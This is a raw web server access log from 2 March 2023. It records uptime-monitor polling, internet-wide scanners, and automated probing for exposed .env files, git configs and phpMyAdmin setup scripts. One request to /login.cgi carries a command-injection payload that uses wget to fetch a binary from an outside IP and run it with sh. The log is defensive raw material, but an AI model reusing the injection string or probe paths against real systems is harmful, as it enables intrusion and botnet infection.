212.91.246.72 - - [02/Mar/2023:20:00:47 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Mar/2023:20:01:47 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Mar/2023:20:02:47 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
20.163.14.232 - - [02/Mar/2023:20:02:58 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30"
20.163.14.232 - - [02/Mar/2023:20:02:58 +0100] "GET /.env HTTP/1.1" 404 309 "-" "Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30"
20.163.14.232 - - [02/Mar/2023:20:02:58 +0100] "POST / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30"
20.163.14.232 - - [02/Mar/2023:20:02:59 +0100] "GET /_profiler/phpinfo HTTP/1.1" 404 322 "-" "Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30"
20.163.14.232 - - [02/Mar/2023:20:03:00 +0100] "GET /debug/default/view?panel=config HTTP/1.1" 404 323 "-" "Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30"
20.163.14.232 - - [02/Mar/2023:20:03:00 +0100] "GET /config.json HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30"
20.163.14.232 - - [02/Mar/2023:20:03:01 +0100] "GET /.git/config HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30"
212.91.246.72 - - [02/Mar/2023:20:03:47 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
4.17.224.133 - - [02/Mar/2023:20:04:22 +0100] "GET /download/.env HTTP/1.1" 404 318 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
4.17.224.133 - - [02/Mar/2023:20:04:23 +0100] "POST /download HTTP/1.1" 404 313 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
172.104.131.24 - - [02/Mar/2023:20:04:26 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 zgrab/0.x"
4.17.224.133 - - [02/Mar/2023:20:04:33 +0100] "GET /download/.env HTTP/1.1" 404 318 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
4.17.224.133 - - [02/Mar/2023:20:04:34 +0100] "POST /download HTTP/1.1" 404 313 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
212.91.246.72 - - [02/Mar/2023:20:04:47 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Mar/2023:20:05:47 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
193.42.33.140 - - [02/Mar/2023:20:05:51 +0100] "GET /muieblackcat HTTP/1.1" 404 317 "-" "-"
193.42.33.140 - - [02/Mar/2023:20:05:51 +0100] "GET //MyAdmin/scripts/setup.php HTTP/1.1" 404 330 "-" "-"
193.42.33.140 - - [02/Mar/2023:20:05:52 +0100] "GET //PHPMYADMIN/scripts/setup.php HTTP/1.1" 404 333 "-" "-"
193.42.33.140 - - [02/Mar/2023:20:05:52 +0100] "GET //PMA/scripts/setup.php HTTP/1.1" 404 326 "-" "-"
193.42.33.140 - - [02/Mar/2023:20:05:52 +0100] "GET //SQL/scripts/setup.php HTTP/1.1" 404 326 "-" "-"
193.42.33.140 - - [02/Mar/2023:20:05:53 +0100] "GET //db/scripts/setup.php HTTP/1.1" 404 325 "-" "-"
193.42.33.140 - - [02/Mar/2023:20:05:53 +0100] "GET //dbadmin/scripts/setup.php HTTP/1.1" 404 330 "-" "-"
193.42.33.140 - - [02/Mar/2023:20:05:53 +0100] "GET //myadmin/scripts/setup.php HTTP/1.1" 404 330 "-" "-"
193.42.33.140 - - [02/Mar/2023:20:05:53 +0100] "GET //mysqladmin/scripts/setup.php HTTP/1.1" 404 333 "-" "-"
193.42.33.140 - - [02/Mar/2023:20:05:53 +0100] "GET //pHpMyAdMiN/scripts/setup.php HTTP/1.1" 404 333 "-" "-"
193.42.33.140 - - [02/Mar/2023:20:05:53 +0100] "GET //pMA/scripts/setup.php HTTP/1.1" 404 326 "-" "-"
193.42.33.140 - - [02/Mar/2023:20:05:53 +0100] "GET //phpAdmin/scripts/setup.php HTTP/1.1" 404 331 "-" "-"
193.42.33.140 - - [02/Mar/2023:20:05:53 +0100] "GET //phpMyAdmin/scripts/setup.php HTTP/1.1" 404 333 "-" "-"
193.42.33.140 - - [02/Mar/2023:20:05:54 +0100] "GET //phpmyadmin/scripts/setup.php HTTP/1.1" 404 333 "-" "-"
193.42.33.140 - - [02/Mar/2023:20:05:54 +0100] "GET //pma/scripts/setup.php HTTP/1.1" 404 326 "-" "-"
193.42.33.140 - - [02/Mar/2023:20:05:54 +0100] "GET //sql/scripts/setup.php HTTP/1.1" 404 326 "-" "-"
193.42.33.140 - - [02/Mar/2023:20:05:54 +0100] "GET //mysql/scripts/setup.php HTTP/1.1" 404 328 "-" "-"
193.42.33.140 - - [02/Mar/2023:20:05:54 +0100] "GET //mysqladmin/scripts/setup.php HTTP/1.1" 404 333 "-" "-"
193.42.33.140 - - [02/Mar/2023:20:05:55 +0100] "GET //MySQLAdmin/scripts/setup.php HTTP/1.1" 404 333 "-" "-"
179.43.177.242 - - [02/Mar/2023:20:06:41 +0100] "GET / HTTP/1.1" 200 1229 "-" "Hello World"
212.91.246.72 - - [02/Mar/2023:20:06:47 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
179.43.177.242 - - [02/Mar/2023:20:07:16 +0100] "GET / HTTP/1.1" 200 1229 "-" "Hello World"
162.81.17.9 - - [02/Mar/2023:20:07:18 +0100] "GET /login.cgi?cli=aa%20aa%27;wget%20http://1.116.115.169/bin%20-O%20-%3E%20/tmp/hk;sh%20/tmp/hk%27$ HTTP/1.1" 400 329 "-" "Hakai/2.0"
212.91.246.72 - - [02/Mar/2023:20:07:47 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Mar/2023:20:08:47 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Mar/2023:20:09:47 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Mar/2023:20:10:47 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
54.155.246.219 - - [02/Mar/2023:20:10:59 +0100] "GET / HTTP/1.0" 200 1229 "-" "Mozilla/5.0 (compatible; NetcraftSurveyAgent/1.0; +info@netcraft.com)"
223.165.109.115 - - [02/Mar/2023:20:11:15 +0100] "GET /database/.env HTTP/1.1" 404 318 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
223.165.109.115 - - [02/Mar/2023:20:11:16 +0100] "POST /database HTTP/1.1" 404 313 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
212.91.246.72 - - [02/Mar/2023:20:11:47 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Mar/2023:20:12:47 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
193.32.162.159 - - [02/Mar/2023:20:13:08 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
212.91.246.72 - - [02/Mar/2023:20:13:47 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Mar/2023:20:14:47 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Mar/2023:20:15:47 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
154.89.5.205 - - [02/Mar/2023:20:16:09 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
193.32.162.159 - - [02/Mar/2023:20:16:23 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
34.76.158.233 - - [02/Mar/2023:20:16:46 +0100] "GET / HTTP/1.1" 200 1229 "-" "python-requests/2.28.2"
212.91.246.72 - - [02/Mar/2023:20:16:47 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
162.142.125.213 - - [02/Mar/2023:20:16:58 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
162.142.125.213 - - [02/Mar/2023:20:16:59 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
162.142.125.213 - - [02/Mar/2023:20:16:59 +0100] "PRI * HTTP/2.0" 400 329 "-" "-"
162.142.125.213 - - [02/Mar/2023:20:16:59 +0100] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
34.76.158.233 - - [02/Mar/2023:20:16:59 +0100] "GET / HTTP/1.1" 200 1229 "-" "python-requests/2.28.2"
212.91.246.72 - - [02/Mar/2023:20:17:47 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Mar/2023:20:18:47 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
4.17.224.133 - - [02/Mar/2023:20:19:07 +0100] "GET /download/.env HTTP/1.1" 404 318 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
4.17.224.133 - - [02/Mar/2023:20:19:08 +0100] "POST /download HTTP/1.1" 404 313 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
212.91.246.72 - - [02/Mar/2023:20:19:47 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Mar/2023:20:20:47 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Mar/2023:20:21:47 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Mar/2023:20:22:47 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Mar/2023:20:23:47 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Mar/2023:20:24:47 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Mar/2023:20:25:47 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Mar/2023:20:26:47 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
193.42.33.140 - - [02/Mar/2023:20:27:16 +0100] "GET /muieblackcat HTTP/1.1" 404 317 "-" "-"
193.42.33.140 - - [02/Mar/2023:20:27:16 +0100] "GET //MyAdmin/scripts/setup.php HTTP/1.1" 404 330 "-" "-"
193.42.33.140 - - [02/Mar/2023:20:27:16 +0100] "GET //PHPMYADMIN/scripts/setup.php HTTP/1.1" 404 333 "-" "-"
193.42.33.140 - - [02/Mar/2023:20:27:16 +0100] "GET //PMA/scripts/setup.php HTTP/1.1" 404 326 "-" "-"
193.42.33.140 - - [02/Mar/2023:20:27:16 +0100] "GET //SQL/scripts/setup.php HTTP/1.1" 404 326 "-" "-"
193.42.33.140 - - [02/Mar/2023:20:27:16 +0100] "GET //db/scripts/setup.php HTTP/1.1" 404 325 "-" "-"
193.42.33.140 - - [02/Mar/2023:20:27:17 +0100] "GET //dbadmin/scripts/setup.php HTTP/1.1" 404 330 "-" "-"
193.42.33.140 - - [02/Mar/2023:20:27:17 +0100] "GET //myadmin/scripts/setup.php HTTP/1.1" 404 330 "-" "-"
193.42.33.140 - - [02/Mar/2023:20:27:17 +0100] "GET //mysqladmin/scripts/setup.php HTTP/1.1" 404 333 "-" "-"
193.42.33.140 - - [02/Mar/2023:20:27:17 +0100] "GET //pHpMyAdMiN/scripts/setup.php HTTP/1.1" 404 333 "-" "-"
193.42.33.140 - - [02/Mar/2023:20:27:17 +0100] "GET //pMA/scripts/setup.php HTTP/1.1" 404 326 "-" "-"
193.42.33.140 - - [02/Mar/2023:20:27:18 +0100] "GET //phpAdmin/scripts/setup.php HTTP/1.1" 404 331 "-" "-"
193.42.33.140 - - [02/Mar/2023:20:27:18 +0100] "GET //phpMyAdmin/scripts/setup.php HTTP/1.1" 404 333 "-" "-"
193.42.33.140 - - [02/Mar/2023:20:27:18 +0100] "GET //phpmyadmin/scripts/setup.php HTTP/1.1" 404 333 "-" "-"
193.42.33.140 - - [02/Mar/2023:20:27:19 +0100] "GET //pma/scripts/setup.php HTTP/1.1" 404 326 "-" "-"
193.42.33.140 - - [02/Mar/2023:20:27:19 +0100] "GET //sql/scripts/setup.php HTTP/1.1" 404 326 "-" "-"
193.42.33.140 - - [02/Mar/2023:20:27:19 +0100] "GET //mysql/scripts/setup.php HTTP/1.1" 404 328 "-" "-"
193.42.33.140 - - [02/Mar/2023:20:27:19 +0100] "GET //mysqladmin/scripts/setup.php HTTP/1.1" 404 333 "-" "-"
193.42.33.140 - - [02/Mar/2023:20:27:19 +0100] "GET //MySQLAdmin/scripts/setup.php HTTP/1.1" 404 333 "-" "-"
212.91.246.72 - - [02/Mar/2023:20:27:47 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
223.165.109.115 - - [02/Mar/2023:20:28:44 +0100] "GET /download/.env HTTP/1.1" 404 318 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
223.165.109.115 - - [02/Mar/2023:20:28:44 +0100] "POST /download HTTP/1.1" 404 313 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
212.91.246.72 - - [02/Mar/2023:20:28:47 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
65.132.186.86 - - [02/Mar/2023:20:29:44 +0100] "GET /vendor/laravel/.env HTTP/1.1" 404 324 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
65.132.186.86 - - [02/Mar/2023:20:29:44 +0100] "POST /vendor/laravel HTTP/1.1" 404 319 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
193.32.162.159 - - [02/Mar/2023:20:29:44 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
212.91.246.72 - - [02/Mar/2023:20:29:47 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
141.193.195.165 - - [02/Mar/2023:20:30:05 +0100] "GET /www/.env HTTP/1.1" 404 313 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
141.193.195.165 - - [02/Mar/2023:20:30:05 +0100] "POST /www HTTP/1.1" 404 308 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
212.91.246.72 - - [02/Mar/2023:20:30:47 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
128.1.131.197 - - [02/Mar/2023:20:31:08 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
193.42.33.140 - - [02/Mar/2023:20:31:26 +0100] "GET /muieblackcat HTTP/1.1" 404 317 "-" "-"
193.42.33.140 - - [02/Mar/2023:20:31:26 +0100] "GET //MyAdmin/scripts/setup.php HTTP/1.1" 404 330 "-" "-"
193.42.33.140 - - [02/Mar/2023:20:31:26 +0100] "GET //PHPMYADMIN/scripts/setup.php HTTP/1.1" 404 333 "-" "-"
193.42.33.140 - - [02/Mar/2023:20:31:27 +0100] "GET //PMA/scripts/setup.php HTTP/1.1" 404 326 "-" "-"
193.42.33.140 - - [02/Mar/2023:20:31:27 +0100] "GET //SQL/scripts/setup.php HTTP/1.1" 404 326 "-" "-"
193.42.33.140 - - [02/Mar/2023:20:31:27 +0100] "GET //db/scripts/setup.php HTTP/1.1" 404 325 "-" "-"
193.42.33.140 - - [02/Mar/2023:20:31:27 +0100] "GET //dbadmin/scripts/setup.php HTTP/1.1" 404 330 "-" "-"
193.42.33.140 - - [02/Mar/2023:20:31:27 +0100] "GET //myadmin/scripts/setup.php HTTP/1.1" 404 330 "-" "-"
193.42.33.140 - - [02/Mar/2023:20:31:27 +0100] "GET //mysqladmin/scripts/setup.php HTTP/1.1" 404 333 "-" "-"
193.42.33.140 - - [02/Mar/2023:20:31:27 +0100] "GET //pHpMyAdMiN/scripts/setup.php HTTP/1.1" 404 333 "-" "-"
193.42.33.140 - - [02/Mar/2023:20:31:27 +0100] "GET //pMA/scripts/setup.php HTTP/1.1" 404 326 "-" "-"
193.42.33.140 - - [02/Mar/2023:20:31:28 +0100] "GET //phpAdmin/scripts/setup.php HTTP/1.1" 404 331 "-" "-"
193.42.33.140 - - [02/Mar/2023:20:31:28 +0100] "GET //phpMyAdmin/scripts/setup.php HTTP/1.1" 404 333 "-" "-"
193.42.33.140 - - [02/Mar/2023:20:31:28 +0100] "GET //phpmyadmin/scripts/setup.php HTTP/1.1" 404 333 "-" "-"
193.42.33.140 - - [02/Mar/2023:20:31:28 +0100] "GET //pma/scripts/setup.php HTTP/1.1" 404 326 "-" "-"
193.42.33.140 - - [02/Mar/2023:20:31:28 +0100] "GET //sql/scripts/setup.php HTTP/1.1" 404 326 "-" "-"
193.42.33.140 - - [02/Mar/2023:20:31:29 +0100] "GET //mysql/scripts/setup.php HTTP/1.1" 404 328 "-" "-"
193.42.33.140 - - [02/Mar/2023:20:31:29 +0100] "GET //mysqladmin/scripts/setup.php HTTP/1.1" 404 333 "-" "-"
193.42.33.140 - - [02/Mar/2023:20:31:29 +0100] "GET //MySQLAdmin/scripts/setup.php HTTP/1.1" 404 333 "-" "-"
212.91.246.72 - - [02/Mar/2023:20:31:47 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Mar/2023:20:32:47 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Mar/2023:20:33:47 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Mar/2023:20:34:47 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Mar/2023:20:35:47 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
154.89.5.219 - - [02/Mar/2023:20:36:38 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
212.91.246.72 - - [02/Mar/2023:20:36:47 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
193.32.162.159 - - [02/Mar/2023:20:37:09 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
212.91.246.72 - - [02/Mar/2023:20:37:47 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Mar/2023:20:38:47 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Mar/2023:20:39:47 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Mar/2023:20:40:47 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Mar/2023:20:41:47 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
206.226.64.150 - - [02/Mar/2023:20:42:07 +0100] "GET /api/.env HTTP/1.1" 404 313 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
206.226.64.150 - - [02/Mar/2023:20:42:07 +0100] "POST /api HTTP/1.1" 404 308 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
20.231.59.48 - - [02/Mar/2023:20:42:28 +0100] "GET /.env HTTP/1.1" 404 309 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
20.231.59.48 - - [02/Mar/2023:20:42:28 +0100] "POST / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
212.91.246.72 - - [02/Mar/2023:20:42:47 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Mar/2023:20:43:47 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
68.183.148.4 - - [02/Mar/2023:20:44:03 +0100] "GET / HTTP/1.0" 200 1229 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:73.0) Gecko/20100101 Firefox/73.0"
206.226.64.150 - - [02/Mar/2023:20:44:10 +0100] "GET /api/.env HTTP/1.1" 404 313 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
206.226.64.150 - - [02/Mar/2023:20:44:11 +0100] "POST /api HTTP/1.1" 404 308 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
212.91.246.72 - - [02/Mar/2023:20:44:47 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
162.142.125.211 - - [02/Mar/2023:20:44:57 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
162.142.125.211 - - [02/Mar/2023:20:44:57 +0100] "PRI * HTTP/2.0" 400 329 "-" "-"
162.142.125.211 - - [02/Mar/2023:20:44:57 +0100] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
206.226.64.150 - - [02/Mar/2023:20:45:36 +0100] "GET /api/.env HTTP/1.1" 404 313 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
206.226.64.150 - - [02/Mar/2023:20:45:37 +0100] "POST /api HTTP/1.1" 404 308 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
212.91.246.72 - - [02/Mar/2023:20:45:47 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Mar/2023:20:46:47 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
193.42.33.140 - - [02/Mar/2023:20:47:04 +0100] "GET /muieblackcat HTTP/1.1" 404 317 "-" "-"
193.42.33.140 - - [02/Mar/2023:20:47:04 +0100] "GET //MyAdmin/scripts/setup.php HTTP/1.1" 404 330 "-" "-"
193.42.33.140 - - [02/Mar/2023:20:47:04 +0100] "GET //PHPMYADMIN/scripts/setup.php HTTP/1.1" 404 333 "-" "-"
193.42.33.140 - - [02/Mar/2023:20:47:04 +0100] "GET //PMA/scripts/setup.php HTTP/1.1" 404 326 "-" "-"
193.42.33.140 - - [02/Mar/2023:20:47:04 +0100] "GET //SQL/scripts/setup.php HTTP/1.1" 404 326 "-" "-"
193.42.33.140 - - [02/Mar/2023:20:47:04 +0100] "GET //db/scripts/setup.php HTTP/1.1" 404 325 "-" "-"
193.42.33.140 - - [02/Mar/2023:20:47:04 +0100] "GET //dbadmin/scripts/setup.php HTTP/1.1" 404 330 "-" "-"
193.42.33.140 - - [02/Mar/2023:20:47:04 +0100] "GET //myadmin/scripts/setup.php HTTP/1.1" 404 330 "-" "-"
193.42.33.140 - - [02/Mar/2023:20:47:04 +0100] "GET //mysqladmin/scripts/setup.php HTTP/1.1" 404 333 "-" "-"
193.42.33.140 - - [02/Mar/2023:20:47:05 +0100] "GET //pHpMyAdMiN/scripts/setup.php HTTP/1.1" 404 333 "-" "-"
193.42.33.140 - - [02/Mar/2023:20:47:05 +0100] "GET //pMA/scripts/setup.php HTTP/1.1" 404 326 "-" "-"
193.42.33.140 - - [02/Mar/2023:20:47:06 +0100] "GET //phpAdmin/scripts/setup.php HTTP/1.1" 404 331 "-" "-"
